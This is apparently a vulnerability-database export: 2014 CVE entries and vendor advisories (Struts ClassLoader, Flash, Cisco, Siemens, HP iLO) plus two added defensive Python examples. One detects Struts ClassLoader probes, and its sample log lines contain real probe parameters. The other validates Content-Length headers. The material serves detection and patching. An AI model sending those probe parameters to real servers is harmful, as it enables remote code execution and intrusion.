http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro
[3] http://struts.apache.org/struts1eol-announcement.html
--
René Gielen
http://twitter.com/rgielen
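The probe requests in the OSCAR report above (OVE-20160329-0001) and the parameter-name blacklist the Struts team recommends here are two sides of one test: does a request carry a BeanUtils property path that reaches getClass()? The following added example (not code from OSCAR, Apache Struts or HP Fortify) implements that test once and uses it both as a filter decision and as a scan over web server access logs. The rule is my own rather than the published regex: split the parameter name on BeanUtils' nested, indexed and mapped separators and refuse it if any segment is the property "class" in any letter case. The access-log lines are constructed for the demo; the two probe URLs are the ones quoted in the OSCAR report.

```python
"""Spot request parameters that reach getClass() through Struts 1 / BeanUtils
property population (CVE-2014-0114), as a filter decision and as a log scan.

Added example, not code from OSCAR, Apache Struts or HP Fortify.  The log
lines are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# BeanUtils property paths use '.' (nested), '[n]' (indexed) and '(key)' (mapped).
_SEGMENT_SPLIT = re.compile(r"""[.\[\]()'"]+""")

# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status bytes
_LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*"')

# Constructed sample; lines 1, 2 and 4 carry probes, line 3 is a normal login.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [29/Mar/2016:10:01:02 +0000] "GET /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster HTTP/1.1" 200 512
10.0.0.9 - - [29/Mar/2016:10:01:07 +0000] "GET /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid HTTP/1.1" 200 512
10.0.0.7 - - [29/Mar/2016:10:02:15 +0000] "POST /oscar/login.do?username=doctor1&classification=urgent HTTP/1.1" 302 0
10.0.0.9 - - [29/Mar/2016:10:03:40 +0000] "GET /oscar/login.do?%43lass.classLoader.resources.dirContext.docBase=x HTTP/1.1" 200 512
"""


def is_classloader_probe(param_name: str) -> bool:
    """True when any segment of the property path is the 'class' property."""
    return any(seg.lower() == "class" for seg in _SEGMENT_SPLIT.split(param_name) if seg)


def offending_params(query: str) -> list:
    """Decoded parameter names in a query string that would hit getClass()."""
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if is_classloader_probe(name)]


def filter_decision(param_names) -> bool:
    """Servlet-filter style gate: True lets the request reach Struts, False means
    reject it (e.g. HTTP 400).  A real filter must be given the names of query
    string *and* request body parameters."""
    return not any(is_classloader_probe(n) for n in param_names)


def scan_access_log(text: str) -> list:
    """(line number, client ip, offending names) for each log line with a probe.
    Only the query string is visible here; POST bodies are not logged."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = _LOG_LINE.match(line)
        if not m:
            continue
        bad = offending_params(urlsplit(m.group("target")).query)
        if bad:
            hits.append((lineno, m.group("ip"), bad))
    return hits


if __name__ == "__main__":
    for lineno, ip, names in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {lineno}: {ip} -> {', '.join(names)}")
```

Decoding before matching matters: the fourth log line spells the property as %43lass, which a pattern applied to the raw query string would miss. On the library side, commons-beanutils 1.9.2 (the version the Gentoo advisory above points to) added a bean introspector that suppresses the class property, but an application has to register it; the filter is the defence that works without touching the framework.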
| VAR-201405-0534 | CVE-2014-3788 | Cogent Real-Time Systems Cogent DataHub Heap Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in the Web Server in Cogent Real-Time Systems Cogent DataHub before 7.3.5 allows remote attackers to execute arbitrary code via a negative value in the Content-Length field in a request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the included Web Server. By providing a request with a crafted Content-Length field, an attacker is able to overflow a heap buffer. An attacker could leverage this to execute arbitrary code in the context of the DataHub process. Cogent DataHub is software for SCADA and automation. Failed exploit attempts will likely result in denial-of-service conditions.
Versions prior to Cogent DataHub 7.3.5 are vulnerable
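A negative Content-Length is the classic way a signed length reaches an allocation or copy routine, so the check belongs at the parser. The following added example (not Cogent code, and not a reconstruction of the DataHub web server) shows the strict rule alongside the permissive one: a Content-Length value must be a plain run of ASCII digits, must agree if repeated, and must stay under a size cap before it is used to size anything. The sample requests are constructed.

```python
"""Strict Content-Length handling for a small HTTP request parser.

Added example, not Cogent code.  The requests below are constructed.
"""
import re

MAX_BODY = 16 * 1024 * 1024  # arbitrary upper bound for this example

GOOD_REQUEST = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
                b"Content-Length: 5\r\n\r\nhello")
NEGATIVE_REQUEST = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
                    b"Content-Length: -1\r\n\r\n")


def naive_content_length(value: str) -> int:
    """What a permissive parser does: int()/atoi() accept '-1', '+5' and ' 7 '."""
    return int(value)


def parse_content_length(headers):
    """Body length, None if the header is absent, or ValueError if it is unusable.

    headers is a list of (name, value) tuples.  Repeated or comma-separated
    values are tolerated only when they are identical.
    """
    values = {part.strip()
              for name, value in headers if name.lower() == "content-length"
              for part in value.split(",")}
    if not values:
        return None
    if len(values) != 1:
        raise ValueError(f"conflicting Content-Length values: {sorted(values)}")
    raw = values.pop()
    if not re.fullmatch(r"[0-9]+", raw):          # 1*DIGIT: no sign, space, hex, exponent
        raise ValueError(f"Content-Length is not 1*DIGIT: {raw!r}")
    length = int(raw)
    if length > MAX_BODY:
        raise ValueError(f"Content-Length {length} exceeds limit {MAX_BODY}")
    return length


def rejects(value: str) -> bool:
    """True if parse_content_length refuses this header value."""
    try:
        parse_content_length([("Content-Length", value)])
    except ValueError:
        return True
    return False


def parse_request(raw: bytes):
    """Split a request into (method, target, headers, body) with a validated length."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.decode("ascii").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip(), value.strip()))
    length = parse_content_length(headers) or 0
    if len(rest) < length:
        raise ValueError(f"body truncated: have {len(rest)}, need {length}")
    return method, target, headers, rest[:length]


def accepts_request(raw: bytes) -> bool:
    try:
        parse_request(raw)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print("naive int('-1') =", naive_content_length("-1"))
    print("strict accepts good request:", accepts_request(GOOD_REQUEST))
    print("strict accepts negative length:", accepts_request(NEGATIVE_REQUEST))
```

The same digit-only rule rejects "+5", "1e3", "0x10" and Python's own "1_000" spelling, all of which a language's integer parser may quietly accept; a native implementation additionally needs the value checked against the allocation size before any arithmetic on it.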
| VAR-201404-0564 | CVE-2014-2186 | Cross-site request forgery vulnerability in the web framework of Cisco WebEx Meetings Server |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco WebEx Meetings Server allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCuj81777. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCuj81777. A third party may be able to hijack the authentication of any user.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
This issue is being tracked by Cisco Bug IDs CSCuj81777, CSCuj81786 and CSCuj81864. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution
| VAR-201404-0530 | CVE-2014-3130 | Privilege escalation vulnerability in the ABAP Help documentation and translation tools in Basis in SAP NetWeaver ABAP Application Server |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
The ABAP Help documentation and translation tools (BC-DOC-HLP) in Basis in SAP Netweaver ABAP Application Server does not properly restrict access, which allows local users to gain privileges and execute ABAP instructions via crafted help messages. SAP BASIS is prone to a security bypass vulnerability.
Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions
| VAR-201404-0560 | CVE-2014-2182 | Denial of service (DoS) vulnerability in Cisco Adaptive Security Appliance Software |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
Cisco Adaptive Security Appliance (ASA) Software, when DHCPv6 relay is configured, allows remote attackers to cause a denial of service (device reload) via a crafted DHCPv6 packet, aka Bug ID CSCun45520.
An attacker can exploit this issue to cause the affected device to reload, denying service to legitimate users.
This issue is tracked by Cisco Bug ID CSCun45520
| VAR-201404-0561 | CVE-2014-2183 | Denial of service (DoS) vulnerability in the L2TP module of Cisco IOS XE on ASR 1000 routers |
CVSS V2: 6.3 CVSS V3: - Severity: MEDIUM |
The L2TP module in Cisco IOS XE 3.10S(.2) and earlier on ASR 1000 routers allows remote authenticated users to cause a denial of service (ESP card reload) via a malformed L2TP packet, aka Bug ID CSCun09973. Cisco IOS is the internetwork operating system used on most Cisco routers and network switches. The vulnerability is due to improper processing of L2TP packets: an authenticated attacker can send malformed L2TP packets to crash the service and cause a denial of service.
Successful exploits may allow attackers to cause a reload of the affected ESP card, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCun09973
| VAR-201404-0562 | CVE-2014-2184 | Information disclosure vulnerability in the IP Manager Assistant component of Cisco Unified Communications Manager |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The IP Manager Assistant (IPMA) component in Cisco Unified Communications Manager (Unified CM) allows remote attackers to obtain sensitive information via a crafted URL, aka Bug ID CSCun74352. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCun74352. A third party may obtain sensitive information via a crafted URL.
An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.
This issue is being tracked by Cisco BugId CSCun74352. IP Manager Assistant (IPMA) is one of the PC-based network management applications, also known as network assistant, which is mainly used to simplify network configuration, deployment, and daily management and maintenance
| VAR-201404-0563 | CVE-2014-2185 | Information disclosure vulnerability in the Call Detail Records Management component of Cisco Unified Communications Manager |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The Call Detail Records (CDR) Management component in Cisco Unified Communications Manager (Unified CM) allows remote authenticated users to obtain sensitive information by reading extraneous fields in an HTML document, aka Bug ID CSCun74374.
An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.
This issue is being tracked by Cisco BugId CSCun74374. Call Detail Records (CDR) Management is one of the call detail record management applications
| VAR-201404-0559 | CVE-2014-2180 | Arbitrary file upload vulnerability in the Document Management component of Cisco Unified Contact Center Express |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The Document Management component in Cisco Unified Contact Center Express does not properly validate a parameter, which allows remote authenticated users to upload files to arbitrary pathnames via a crafted HTTP request, aka Bug ID CSCun74133.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
This issue is being tracked by Cisco Bug ID CSCun74133. Document Management is one of the document management applications. A remote attacker could exploit this vulnerability by sending a specially crafted HTTP request to upload a file to an arbitrary pathname
| VAR-201404-0287 | CVE-2014-0113 | ClassLoader manipulation vulnerability in CookieInterceptor in Apache Struts |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094. Through a crafted request, a third party may "manipulate" the ClassLoader and execute arbitrary code. Apache Struts is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.
Apache Struts versions 2.0.0 through 2.3.16.1 are vulnerable
| VAR-201404-0197 | CVE-2014-0515 | Adobe Flash Player buffer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014. Adobe Flash Player contains a buffer overflow vulnerability. Attacks exploiting this vulnerability were observed in April 2014. A third party may execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201405-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Flash Player: Multiple vulnerabilities
Date: May 03, 2014
Bugs: #501960, #504286, #507176, #508986
ID: 201405-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Adobe Flash Player, the
worst of which could result in execution of arbitrary code.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass
the Same Origin Policy or read the clipboard via unspecified vectors.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.356"
References
==========
[ 1 ] CVE-2014-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0498
[ 2 ] CVE-2014-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0499
[ 3 ] CVE-2014-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0502
[ 4 ] CVE-2014-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0503
[ 5 ] CVE-2014-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0504
[ 6 ] CVE-2014-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0506
[ 7 ] CVE-2014-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0507
[ 8 ] CVE-2014-0508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0508
[ 9 ] CVE-2014-0509
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0509
[ 10 ] CVE-2014-0515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0515
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201405-04.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:0447-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0447.html
Issue date: 2014-04-29
CVE Names: CVE-2014-0515
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes one security issue is now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having Critical
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. This
vulnerability is detailed in the Adobe Security Bulletin APSB14-13, listed
in the References section.
A flaw was found in the way flash-plugin displayed certain SWF content. An
attacker could use this flaw to create a specially crafted SWF file that
would cause flash-plugin to crash or, potentially, execute arbitrary code
when the victim loaded a page containing the malicious SWF content.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.356-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.356-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.356-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.356-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.356-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.356-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.356-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.356-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.356-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.356-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0515.html
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb14-13.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201404-0551 | CVE-2014-0780 |
InduSoft Web Studio NTWebServer Directory Traversal Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201709-0120 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: HIGH |
Directory traversal vulnerability in NTWebServer in InduSoft Web Studio 7.1 before SP2 Patch 4 allows remote attackers to read administrative passwords in APP files, and consequently execute arbitrary code, via unspecified web requests. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ability to browse outside of the web root via directory traversal. A remote attacker can abuse this to download sensitive files and execute remote code under the context of the user. InduSoft Web Studio is a complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. InduSoft Web Studio is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.
InduSoft Web Studio 7.1 is vulnerable; other versions may also be affected
| VAR-201404-0430 | CVE-2014-2908 |
Siemens SIMATIC S7-1200 Cross-Site Scripting Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201805-0053 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Siemens SIMATIC is automation software in a single engineering environment. A cross-site scripting vulnerability exists in Siemens SIMATIC S7-1200. Because some unspecified input is not properly filtered before being used, an attacker can exploit the vulnerability to execute arbitrary HTML and script code in a user's browser session at the affected site. Siemens SIMATIC S7-1200 is prone to an unspecified cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input before returning it to the user. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SIMATIC S7-1200 versions 2.x and 3.x are vulnerable. Siemens SIMATIC S7-1200 is a programmable logic controller (PLC) used in small and medium-sized automation systems of Siemens, Germany
| VAR-201404-0631 | CVE-2014-2601 | HP Integrated Lights-Out 2 server denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The server in HP Integrated Lights-Out 2 (aka iLO 2) 2.23 and earlier allows remote attackers to cause a denial of service via crafted HTTPS traffic, as demonstrated by traffic from a CVE-2014-0160 vulnerability-assessment tool. HP Integrated Lights-Out is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to trigger denial-of-service conditions.
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04244787
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04244787
Version: 1
HPSBHF03006 rev.1 - HP Integrated Lights-Out 2 (iLO 2) Denial of Service
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-04-24
Last Updated: 2014-04-24
Potential Security Impact: Denial of Service. The denial
of service condition occurs only when the iLO 2 is scanned by vulnerability
assessment tools that test for CVE-2014-0160 (Heartbleed vulnerability). iLO
2 servers are not vulnerable to CVE-2014-0160.
References: CVE-2014-2601, SSRT101509
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference         Base Vector                    Base Score
CVE-2014-2601     (AV:N/AC:L/Au:N/C:N/I:N/A:C)   7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following firmware updates available to resolve this
vulnerability: Please note that this firmware update does not apply to
p-class blades (BL20p G4, BL25p G2, and BL45p G2). A separate firmware
release will be made available for those systems.
Online ROM Flash Component for Windows x86
ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1443420321/v96367
Online ROM Flash Component for Windows x64
ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p2023401934/v96368
Linux Online Flash Component
ftp://ftp.hp.com/pub/softlib2/software1/sc-linux-fw-ilo/p1285463034/v96369
HISTORY
Version:1 (rev.1) - 24 April 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
| VAR-201404-0443 | CVE-2014-2909 | Siemens SIMATIC S7-1200 CPU integrated web server CRLF injection vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
CRLF injection vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary HTTP headers via unspecified vectors. Siemens SIMATIC is automation software in a single engineering environment. Because some unspecified input is not properly filtered before being used in an HTTP header, an attacker can exploit the vulnerability to inject HTTP headers into the response sent to the user. Siemens SIMATIC S7-1200 is prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
SIMATIC S7-1200 2.x and 3.x versions are vulnerable. Siemens SIMATIC S7-1200 is a programmable logic controller (PLC) used in small and medium-sized automation systems of Siemens, Germany
| VAR-201404-0040 | CVE-2012-3946 | Cisco IOS interface ACL bypass vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco IOS before 15.3(2)S allows remote attackers to bypass interface ACL restrictions in opportunistic circumstances by sending IPv6 packets in an unspecified scenario in which expected packet drops do not occur for "a small percentage" of the packets, aka Bug ID CSCty73682. Cisco IOS contains a vulnerability that allows interface ACL restrictions to be bypassed. Cisco IOS is the internetwork operating system used on most Cisco Systems routers and network switches.
This issue allows remote attackers to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.
This issue is tracked by Cisco Bug ID CSCty73682
| VAR-201404-0044 | CVE-2012-5723 | Cisco ASR 1000 Series device software denial of service (DoS) vulnerability |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
Cisco ASR 1000 devices with software before 3.8S, when BDI routing is enabled, allow remote attackers to cause a denial of service (device reload) via crafted (1) broadcast or (2) multicast ICMP packets with fragmentation, aka Bug ID CSCub55948. The Cisco ASR 1000 Series Aggregation Services Routers drive the transformation of service providers and enterprise network edge areas with their compact form factor, industry-leading performance, instant service capabilities and high smoothness. The Cisco ASR 1000 Series Routers are prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCub55948
| VAR-201404-0286 | CVE-2014-0112 | Apache Struts2 ClassLoader allows access to class properties via request parameters |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094. Apache Struts provided by the Apache Software Foundation is a software framework for creating Java web applications. Apache Struts contains a vulnerability where the ClassLoader may be manipulated. NTT-CERT reported this vulnerability to IPA.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.
1. Summary:
A minor version update (from 7.2 to 7.3) is now available for Red Hat Fuse.
The purpose of this text-only errata is to inform you about the security
issues fixed in this release.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Description:
This release of Red Hat Fuse 7.3 serves as a replacement for Red Hat Fuse
7.2, and includes bug fixes and enhancements, which are documented in the
Release Notes document linked to in the References.
Security Fix(es):
* jackson-databind: A deserialization flaw was discovered in the
jackson-databind which could allow an unauthenticated user to perform code
execution by sending the maliciously crafted input to the readValue method
of the ObjectMapper. (CVE-2017-7525)
* struts2: ClassLoader manipulation via request parameters (CVE-2014-0112)
* jetty: HTTP request smuggling (CVE-2017-7657)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
3. Solution:
Before applying the update, back up your existing installation, including
all applications, configuration files, databases and database settings, and
so on.
Installation instructions are available from the Fuse 7.3.0 product
documentation page:
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/
4. Bugs fixed (https://bugzilla.redhat.com/):
1091939 - CVE-2014-0112 struts2: ClassLoader manipulation via request parameters
1462702 - CVE-2017-7525 jackson-databind: Deserialization vulnerability via readValue method of ObjectMapper
1595620 - CVE-2017-7657 jetty: HTTP request smuggling
5. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2014-0007
Synopsis: VMware product updates address security vulnerabilities in
Apache Struts library
Issue date: 2014-06-24
Updated on: 2014-06-24 (Initial Advisory)
CVE number: CVE-2014-0050, CVE-2014-0094, CVE-2014-0112
- ------------------------------------------------------------------------
1. Summary
VMware product updates address security vulnerabilities in Apache
Struts library
2. Relevant releases
VMware vCenter Operations Management Suite prior to 5.8.2
3. Problem Description
a. The Apache Struts library is updated to version 2.3.16.2 to
address multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2014-0050, CVE-2014-0094, and
CVE-2014-0112 to these issues.
CVE-2014-0112 may lead to remote code execution. This issue was
found to be only partially addressed in CVE-2014-0094.
CVE-2014-0050 may lead to a denial of service condition.
vCenter Operations Management Suite (vCOps) is affected by both
CVE-2014-0112 and CVE-2014-0050. Exploitation of CVE-2014-0112
may lead to remote code execution without authentication.
vCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not
by CVE-2014-0112.
Workaround
A workaround for CVE-2014-0112 is documented in VMware Knowledge Base
article 2081470.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware          Product   Running   Replace with/
Product         Version   on        Apply Patch
=============   =======   =======   =================
vCOPS           5.8.x     any       vCOPS 5.8.2
vCOPS           5.7.x     any       patch pending *
vCO             5.5       any       patch pending
vCO             5.1       any       patch pending
vCO             4.2       any       patch pending
*Customers are advised to apply the workaround or update to vCOps
5.8.2.
4. Solution
Please review the patch/release notes for your product and version
and verify the checksum of your downloaded file.
vCenter Operations Management Suite 5.8.2
-----------------------------------------
Downloads and Documentation:
https://www.vmware.com/go/download-vcops
5. References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0112
http://kb.vmware.com/kb/2081470
- ------------------------------------------------------------------------
6. Change log
2014-06-24 VMSA-2014-0007
